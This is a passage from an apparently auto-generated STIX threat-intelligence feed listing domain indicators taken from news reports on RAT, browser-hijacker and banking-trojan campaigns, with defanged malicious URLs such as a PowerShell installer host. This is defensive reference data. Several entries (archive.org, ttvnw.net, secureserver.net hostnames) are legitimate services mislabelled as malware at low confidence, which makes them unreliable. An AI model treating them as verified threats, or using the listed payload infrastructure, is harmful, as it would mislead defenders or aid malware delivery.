'dropjeans.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d3ac8b7-5860-48a0-8814-4fe2c2a79702","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: edgeplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tra","pattern":"[domain-name:value = 'edgeplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eef5dd7b-14e3-4936-8da4-9f68e720bdc6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: exchangeclub.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tracker infrastructure Domain co","pattern":"[domain-name:value = 'exchangeclub.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ce3cd2ea-7cf1-4265-85a8-1dd3f9f30fdd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: existencediscussion.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CRI-1171 installation-tracker infrastructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz","pattern":"[domain-name:value = 'existencediscussion.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6378a8a8-d38d-4d2b-9ca4-5838136dd3da","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: expansionsalt.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz ; connect.fogparcel[.]info ; c","pattern":"[domain-name:value = 'expansionsalt.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4a7bf53b-145d-48cb-b9c4-d2b30289a952","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: extentrack.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule delivery, telemetry,","pattern":"[domain-name:value = 'extentrack.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e457c22c-7eb1-47ab-831e-3bdbfe93a8c1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: filescloud.pro","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: xspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]c","pattern":"[domain-name:value = 'filescloud.pro']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ba09d0a0-a410-46a3-b679-32bfc76a3f44","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: filexspace.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: helake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud","pattern":"[domain-name:value = 'filexspace.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97ff4c70-94fd-4313-aa20-56defda98eb9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: filexstorage.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: sfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ;","pattern":"[domain-name:value = 'filexstorage.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--822d4b44-4b01-470a-a9f6-81744947da69","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: finersto.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro","pattern":"[domain-name:value = 'finersto.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d03b6a7f-e0b6-45c1-aa9d-7bee0f449378","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: fuelleg.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: lview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]in","pattern":"[domain-name:value = 'fuelleg.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05654a41-1a9e-4a77-9e52-1017086b79ff","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ggclicker.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: es[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fak","pattern":"[domain-name:value = 'ggclicker.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34c233a7-6230-46f1-9b4c-6a8b476fc80b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: mifilesx.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watcha","pattern":"[domain-name:value = 'mifilesx.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--42f16ed0-485c-464e-832d-6d8d0945688a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: minewave.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: traw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]x","pattern":"[domain-name:value = 'minewave.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e07e9114-3909-421c-9ab3-437058bab467","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: mqsearch.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule de","pattern":"[domain-name:value = 'mqsearch.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eec92a45-f307-4af7-859b-fe92fc51840e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: needcherries.online","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker infrastructure Domain ve","pattern":"[domain-name:value = 'needcherries.online']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f8d7e264-bcd8-4cd0-94f1-7580400c384a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: noiseship.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: earch hijacking, callback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]co","pattern":"[domain-name:value = 'noiseship.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b6e21c01-02ba-40db-971f-dcbbc88a6640","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: pcsdkflyer.ca","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ia RAT stage hosts and Python-agent C2 typosquat Domain reg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info","pattern":"[domain-name:value = 'pcsdkflyer.ca']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--061ac435-f0bb-48d7-a172-0d3af5de73fc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: placespoon.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker","pattern":"[domain-name:value = 'placespoon.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b3b817fe-e97a-48d3-81be-b11412e8f2d1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: statementtouch.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-s","pattern":"[domain-name:value = 'statementtouch.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--89b024f7-27c9-4462-9dca-7f8fab18d821","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: stryper.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cro\\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia RAT URL","pattern":"[domain-name:value = 'stryper.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f5919890-00da-4c13-8ae3-64001099a5ea","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: suitstraw.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nd-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[","pattern":"[domain-name:value = 'suitstraw.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ad786be1-d4fe-47e3-83f2-96d12a8233ea","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: trickflag.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ad handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsyste","pattern":"[domain-name:value = 'trickflag.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b3865bb0-ff8d-45e9-a4a2-f394b89f8d98","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: vendralo.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: eg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; dr","pattern":"[domain-name:value = 'vendralo.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--65e21891-5ac8-4833-baa2-73aa83dc7112","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: venrx.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ot[.]com ; venrx.blogspot[.]com ; venrxhub.blogspot[.]com ; venrx[.]xyz ; ravexoffical.blogspot[.]com ; adex-blog.blogspot[.]com","pattern":"[domain-name:value = 'venrx.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0b2717c4-0e2f-442e-bfe9-97cf922945de","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: vesselsystem.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ckflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]inf","pattern":"[domain-name:value = 'vesselsystem.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75f93e1c-92aa-4268-99e1-f6b7d73e9925","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: voyagemist.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: s SEO-poisoning and fake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader paylo","pattern":"[domain-name:value = 'voyagemist.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9fd922e9-64c1-4c7c-81e6-54d9c99fd2b6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: watchadvance.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: x[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fake file-hosting infras","pattern":"[domain-name:value = 'watchadvance.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e0e7a7a9-1a24-47d6-822c-5b0050c1baf7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xrsdownload.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-ac","pattern":"[domain-name:value = 'xrsdownload.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dcd0e546-25cd-4dcf-89f2-53d17016aeb6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: zippyfiles.net","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclic","pattern":"[domain-name:value = 'zippyfiles.net']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e7f27a7-c4c5-494d-8b90-3f0aef616add","created":"2026-09-14T07:24:39.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ttvnw.net","description":"Seen in \"Malicious Twitch Browser Extension Leaks OAuth Tokens From Nearly 31,000 Users\" (The Hacker News). Context: es so by routing Twitch's video-playlist requests to \"usher.ttvnw[.]net\" through operator-controlled proxy servers along with the","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T07:24:39.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/malicious-twitch-browser-extension.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ff700eff-8468-4b49-972f-baed7c5f2a1a","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: 94ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390 Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserve","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--daf16020-f8df-4924-aa95-576ca747c2d2","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: ain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net IP address 72[.]167[.]48[.]63 IP address 209[.]","pattern":"[domain-name:value = '13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--276779de-7754-4acf-91ca-312569041f39","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: 35a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemoryScanne","pattern":"[domain-name:value = 'archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--244f72f2-dc83-4bff-a665-2b67bb69bbd7","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: connection.upgradeonline.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage: persistence and th","pattern":"[domain-name:value = 'connection.upgradeonline.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--df7917d6-3d03-4178-98f0-dc0a032fc675","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: granderevolucao.store","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: licious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET PE Inj","pattern":"[domain-name:value = 'granderevolucao.store']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security 